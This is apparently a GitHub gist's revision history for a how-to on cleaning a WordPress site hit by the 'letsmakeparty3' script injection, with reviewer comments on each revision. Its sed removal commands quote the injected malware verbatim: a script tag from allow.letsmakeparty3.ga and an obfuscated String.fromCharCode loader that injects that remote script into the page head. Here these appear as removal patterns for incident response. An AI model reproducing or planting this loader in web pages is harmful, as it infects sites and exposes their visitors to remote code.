@fabmars
Last active December 12, 2020 18:33

Revisions

  1. fabmars revised this gist Jul 16, 2020. No changes.
  2. fabmars revised this gist Jul 16, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion gistfile1.txt
    Original file line number Diff line number Diff line change
    @@ -15,7 +15,7 @@ and check rights are back to 644 (probably 604 though) on those files

    4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/

    5) change password in the DB: `SET PASSWORD = PASSWORD('mynewpassword');` qnd put the same password in wp-config.php too of course.
    5) change password in the DB: `SET PASSWORD = PASSWORD('mynewpassword');` and put the same password in wp-config.php too of course.

    6) update <prefix>_options table and reset 'siteurl' and 'home' props to the original site's url (eg: https://www.mywordpressdomain.com ) as they certainly also contain a link to the malicious site
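    Review bot: `SET PASSWORD = PASSWORD('mynewpassword')` with no `FOR` clause changes the password of whichever account runs the statement, so it has to be issued as the WordPress DB user itself (or from an admin account as `SET PASSWORD FOR 'wpuser'@'localhost' = ...`, with `wpuser` standing in for the real account); otherwise wp-config.php and the DB end up out of sync. Worth stating that `mynewpassword` is a placeholder to be replaced by a freshly generated value, and that the edited wp-config.php must not be pasted anywhere public.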

  3. fabmars revised this gist Jul 16, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion gistfile1.txt
    @@ -1,5 +1,5 @@
    A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b
    Here's a how-to restore the site functionality (but not plug the hole wherebver it is)
    Here's a how-to restore the site functionality (but not plug the hole wherever it is)

    1) download all files via ftp under a *unix* system to preserve the rigths as much as possible. I wouldn't do this from Windows but if you're commpelled to, at least download the files in binary mode to preserve line returns.
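    Review bot: two more typos remain on the unchanged step 1 line, `rigths` and `commpelled`. While that line is being edited, it should also say that the download goes to a directory that is then left untouched, with the `sed` rewrites of step 2 done on a second copy, so the original infected files stay available as evidence for the final root-cause step.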

  4. fabmars revised this gist Jul 16, 2020. 1 changed file with 3 additions and 3 deletions.
    6 changes: 3 additions & 3 deletions gistfile1.txt
    @@ -21,8 +21,8 @@ and check rights are back to 644 (probably 604 though) on those files

    7) Now you can access your WP again. Log in the wp admin console and change your password

    7) Remove woocommerce and all unneeded plugins
    8) Remove woocommerce and all unneeded plugins

    8) Remove ability to post comments
    9) Remove ability to post comments

    9) Now let's find out how the joker entered the place...TBC
    10) Now let's find out how the joker entered the place...TBC
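    Review bot: the renumbering fixes the duplicate 7), but step 10 is still `TBC`, and steps 1-9 only remove the injected script and rotate secrets; they do nothing about the entry point that the header admits is unknown. Until that step is written, the remaining plugins and WordPress core should at least be brought to current versions and the site treated as still exposed.
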
  5. fabmars revised this gist Jul 16, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion gistfile1.txt
    @@ -10,7 +10,7 @@ find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> El

    find ./www -type f -print0 | xargs -0 sed -i "s+Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();++g"

    3) upload files overwriting if size is different (available setting in FZ)
    3) upload files overwriting if size is different (available upload setting in FileZilla)
    and check rights are back to 644 (probably 604 though) on those files

    4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/
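    Review bot: the `sed -i` pipelines of step 2 (context line above) run over every regular file under `./www`, images and archives included, and GNU sed rewrites each file even when nothing matches, so every file gets a new modification time. Run `grep -rlF 'letsmakeparty3' ./www` first to get the list of files that actually contain the injection, keep that list as the incident record, and feed only those files to sed; it also makes the "overwrite if size is different" upload in step 3 touch only the files that were really cleaned.
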
  6. fabmars revised this gist Jul 16, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion gistfile1.txt
    @@ -15,7 +15,7 @@ and check rights are back to 644 (probably 604 though) on those files

    4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/

    5) change password in wp-config.php and change it in the DB too of course: SET PASSWORD = PASSWORD('mynewpassword');
    5) change password in the DB: `SET PASSWORD = PASSWORD('mynewpassword');` qnd put the same password in wp-config.php too of course.

    6) update <prefix>_options table and reset 'siteurl' and 'home' props to the original site's url (eg: https://www.mywordpressdomain.com ) as they certainly also contain a link to the malicious site
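    Review bot: `PASSWORD()` was deprecated in MySQL 5.7 and removed in MySQL 8.0, where the statement as written fails; on 8.0 `SET PASSWORD = 'mynewpassword';` takes the plain text directly, while MariaDB still accepts the `PASSWORD()` form. `ALTER USER CURRENT_USER() IDENTIFIED BY 'mynewpassword';` works on MySQL 5.7+ and MariaDB 10.2+ and would be the portable choice; the how-to should say which server it assumes.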

  7. fabmars revised this gist Jul 16, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion gistfile1.txt
    @@ -1,7 +1,7 @@
    A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b
    Here's a how-to restore the site functionality (but not plug the hole wherebver it is)

    1) download all files via ftp under a *unix* system to preserve the rigths as much as possible
    1) download all files via ftp under a *unix* system to preserve the rigths as much as possible. I wouldn't do this from Windows but if you're commpelled to, at least download the files in binary mode to preserve line returns.

    2) fix altered files
    find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g'
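    Review bot: the how-to rotates the salts (step 4), the DB password (step 5) and the admin password (step 7), but not the FTP or hosting credentials used in steps 1 and 3; a step to change those belongs in the list as well. Plain FTP also sends the login and the file contents in clear text, so if the host offers SFTP or FTPS the transfer should use that instead.
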
  8. fabmars revised this gist Jul 16, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion gistfile1.txt
    @@ -17,7 +17,7 @@ and check rights are back to 644 (probably 604 though) on those files

    5) change password in wp-config.php and change it in the DB too of course: SET PASSWORD = PASSWORD('mynewpassword');

    6) update <prefix>_options table and reset 'siteurl' and 'home' props as they certainly also contain a link to the malicious site
    6) update <prefix>_options table and reset 'siteurl' and 'home' props to the original site's url (eg: https://www.mywordpressdomain.com ) as they certainly also contain a link to the malicious site

    7) Now you can access your WP again. Log in the wp admin console and change your password
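    Review bot: read the current values before overwriting them so the change is recorded: `SELECT option_name, option_value FROM <prefix>_options WHERE option_name IN ('siteurl','home');`. The scheme (http vs https) and the presence or absence of `www` must match the original exactly, because WordPress redirects to whatever `siteurl` says. A `SELECT option_name FROM <prefix>_options WHERE option_value LIKE '%letsmakeparty3%';` over the same table shows whether other options, not just these two, carry the injected hostname.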

  9. fabmars revised this gist Jul 16, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion gistfile1.txt
    @@ -17,7 +17,7 @@ and check rights are back to 644 (probably 604 though) on those files

    5) change password in wp-config.php and change it in the DB too of course: SET PASSWORD = PASSWORD('mynewpassword');

    6) update <prefix>_options table and reset siteurl and home as they certainly also contain a link to the malicious site
    6) update <prefix>_options table and reset 'siteurl' and 'home' props as they certainly also contain a link to the malicious site

    7) Now you can access your WP again. Log in the wp admin console and change your password
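    Review bot: `siteurl` and `home` are rows of the options table (`option_name`/`option_value`) rather than properties, so the update is `UPDATE <prefix>_options SET option_value = 'https://www.mywordpressdomain.com' WHERE option_name IN ('siteurl','home');`; spelling the statement out would make step 6 as concrete as step 5. "Certainly also contain" is an assumption; "check whether they contain" with the query to do so reads more accurately.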

  10. fabmars revised this gist Jul 16, 2020. 1 changed file with 2 additions and 2 deletions.
    4 changes: 2 additions & 2 deletions gistfile1.txt
    @@ -1,7 +1,7 @@
    A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b
    Here's a how-to restore the site functionality (but not plug the hole wherebver it is)

    1) download all files
    1) download all files via ftp under a *unix* system to preserve the rigths as much as possible

    2) fix altered files
    find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g'
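    Review bot: an FTP download does not carry Unix mode bits; `RETR` transfers file data only, and common clients such as FileZilla give the local copy the client's umask rather than the remote permissions, so doing step 1 on a Unix box does not by itself preserve the rights. Save the remote directory listing, which shows permissions and modification times, before downloading; that listing is what step 3's permission check and the later root-cause work will need.
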
    @@ -25,4 +25,4 @@ and check rights are back to 644 (probably 604 though) on those files

    8) Remove ability to post comments

    9) Now let's find out how the joken entered the place
    9) Now let's find out how the joker entered the place...TBC
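    Review bot: step 9 is the only step that looks at the root cause and it is `TBC`, yet the earlier steps already destroy the evidence it needs: `sed -i` in step 2 resets modification times locally and the upload in step 3 does the same on the server. The web server access and error logs for the period, and the modification timestamps from the FTP listing, should be captured before steps 2 and 3 run, and this step should say so.
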
  11. fabmars revised this gist Jul 16, 2020. 1 changed file with 19 additions and 1 deletion.
    20 changes: 19 additions & 1 deletion gistfile1.txt
    @@ -1,3 +1,6 @@
    A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b
    Here's a how-to restore the site functionality (but not plug the hole wherebver it is)

    1) download all files

    2) fix altered files
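    Review bot: the new header should name the indicator that identifies this infection, the injected script host `allow.letsmakeparty3.ga` that the sed commands below remove, and the date it was noticed, so the page can be used to recognise the same infection elsewhere and the root-cause step has a starting point for its timeline.
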
    @@ -7,4 +10,19 @@ find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> El

    find ./www -type f -print0 | xargs -0 sed -i "s+Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();++g"

    3) upload files overwriting if size is different (available setting in FZ)
    3) upload files overwriting if size is different (available setting in FZ)
    and check rights are back to 644 (probably 604 though) on those files

    4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/

    5) change password in wp-config.php and change it in the DB too of course: SET PASSWORD = PASSWORD('mynewpassword');

    6) update <prefix>_options table and reset siteurl and home as they certainly also contain a link to the malicious site

    7) Now you can access your WP again. Log in the wp admin console and change your password

    7) Remove woocommerce and all unneeded plugins

    8) Remove ability to post comments

    9) Now let's find out how the joken entered the place
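    Review bot: two steps are numbered 7), so `7) Remove woocommerce and all unneeded plugins` should be 8) and the following numbers shift; `joken` is presumably `joker`. The two `3) upload files ...` lines are identical, so that change is whitespace only. On content, step 4 (new salts from the WordPress generator) invalidates every existing login cookie, which is the intent here, but it should be stated so the re-authentication required at step 7 is expected.
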
  12. fabmars created this gist Jul 16, 2020.
    10 changes: 10 additions & 0 deletions gistfile1.txt
    @@ -0,0 +1,10 @@
    1) download all files

    2) fix altered files
    find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g'

    find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();</script>++g"

    find ./www -type f -print0 | xargs -0 sed -i "s+Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();++g"

    3) upload files overwriting if size is different (available setting in FZ)
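    Review bot: in the first `sed` command the single quotes around the URL terminate the shell's single-quoted argument, so sed receives `s+<script type=text/javascript src=https://allow.letsmakeparty3.ga/l.js?i=1></script>++g` with the quotes stripped (the now-unquoted `?` is also exposed to the shell's glob expansion), and the pattern will not match a tag written as `src='https://...'`. Wrap the whole expression in double quotes like the second and third commands: `sed -i "s+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g"`. The `.` characters in all three patterns are regex wildcards; that is harmless here since it only widens the match.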